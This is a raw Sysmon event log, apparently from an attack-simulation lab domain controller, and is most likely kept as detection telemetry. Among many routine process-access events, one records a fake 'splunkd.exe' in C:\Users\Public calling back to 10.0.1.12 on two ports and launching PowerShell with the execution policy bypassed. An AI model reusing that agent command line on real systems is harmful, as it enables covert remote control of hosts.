15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C7F-5FA1-6F00-000000008801}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7F-5FA1-6F00-000000008801}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.379{D28789B6-7C7F-5FA1-6F00-000000008801}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.613{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.pdc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.769{D28789B6-7C62-5FA1-0B00-000000008801}8684440C:\Windows\system32\lsass.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.769{D28789B6-7C62-5FA1-0B00-000000008801}8684440C:\Windows\system32\lsass.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.722{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_wktkce0x.43v.ps12020-11-03 15:51:28.722 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.693{D28789B6-7C6B-5FA1-2800-000000008801}24402636C:\Windows\system32\conhost.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.692{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.691{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.691{D28789B6-7C6B-5FA1-2700-000000008801}23248C:\Users\Public\splunkd.exe{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.691{D28789B6-7C80-5FA1-7100-000000008801}4408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C jkjtphC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.394{D28789B6-7C80-5FA1-7000-000000008801}43564360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C80-5FA1-7000-000000008801}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 